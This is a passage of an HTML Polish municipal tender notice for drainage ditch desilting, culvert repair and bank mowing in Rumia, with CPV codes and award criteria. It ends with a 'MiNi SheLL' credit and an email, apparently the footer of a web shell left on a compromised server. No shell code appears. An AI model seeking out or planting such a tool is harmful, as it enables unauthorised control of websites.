4)	 Łączna długość rowów do odmulenia 1355 mb, parametry rowów - głębokość do 2,0 m, grubość warstwy namułu do 50 cm, szer. dna do 0,8 m, nachylenie skarp 1:1,5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.36.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odtworzenie rowu przy ul. Torfowej w Rumi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót melioracyjnych, polegających na:
1)	Odmulenie rowu przy ul. Torfowej (prawa strona) na odcinku 295 mb, pogłębienie do rzędnej dna pierwotnego, wykopy z wywozem urobku, warstwa namułu do 50 cm,
2)	Wyprofilowanie skarp rowu, ręczne obrobienie na czysto po koparce,
3)	Zebranie i wywóz na wysypisko Eko Dolina Sp. z o.o. Łężyce zalegających w rowie, śmieci, karpin, gałęzi i porostów pozostałych po wykoszeniu rowu,
4)	 Wykonanie remontu uszkodzonych 3 szt. przepustów z rur betonowych na przepusty z rur żelbetowych o średnicy 500 mm i L=5 mb każdy. Rozbiórka i wywóz na wysypisko śmieci uszkodzonych przewodów rurowych, ułożenie nowego przewodu na rusztach drewnianych i geotkaninie o wytrzymałości 200 kN/m, podsypce żwirowej grubości 20 cm. Obsypanie gruntem dowiezionym (pospółka), zagęszczenie nasypu, utwardzenie nawierzchni nad przepustem kruszywem (warstwa grubości 40 cm - 8m2/mb) Umocnienie wlotu i wylotu przepustu płytami prefabrykowanymi na podsypce piaskowej i geowłókninie (20 m2). Wykonanie palisady z kołków drewnianych o średnicy 7-9 cm, L= 1,2m w dnie rowu (5 mb). Umocnienie kiszką faszynową średn. 2x20 cm - (odcinek 20 mb), narzut kamienny w dnie (1 m3). Darniowanie skarp na płask (20m2). Pompowanie wody z wykopu, wykonanie tymczasowego rurociągu dla odprowadzenia wód, grodze ziemne. Głębokość rowów do 2,0m , szer. dna do 0,8m, nachylenie skarp 1:1,5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.36.00-2, 28.83.20.00-3, 45.11.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykoszenie porostów ze skarp i z dna rowów melioracyjnych na terenie miasta Rumi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót melioracyjnych, polegających na:
1) wykaszaniu traw i porostów gęstych twardych ze skarp i dna rowów o łącznej długości 8,214 km, wygrabieniu wykoszonych porostów, zebranie i wywiezieniu śmieci zalegających na skarpach i w dnie rowów do zakładu Eko Dolina Sp. z o.o. Łężyce. Zakres robót obejmuje następujące rowy i kanały melioracyjne:
a) rów graniczny L3-14 na odcinku od ul. Jeziornej do granicy miasta - 2550 mb,
b) rów L3-17 przy Jeziornej-lewa strona - 850 mb,
c) rów 9L3-14 od piaskownika przy ul. Kosynierów do rowu granicznego - 1350 mb,
d) rowy przy ul. Torfowej - 550mb,
e) rowy przy ul. Różanej - 1680 mb,
f) rów od piaskownika przy ul. Grottgera do końca - 506 mb,
g) rów od ujścia kanalizacji deszczowej ul. Chmielna do przepustu pod ul. Św. Józefa   - 368 mb,
h) rów przy ul. Źródlanej - 70 mb,
i) rów przy ul. Stefana Batorego (II część ulicy) - 150 mb,
j) rów przy ul. Nagietkowej - 140 mb.  
2) oczyszczeniu przepustów o zamuleniu do 1/3 średnicy, posadowionych na trasie konserwacji bieżącej rowów. 
3) oczyszczeniu ujścia rowów bocznych do 2m w głąb. Głębokość rowów do 2,0 m, szer. dna do 0,8 m, nachylenie skarp 1:1,5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.11.20.00-8, 77.00.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com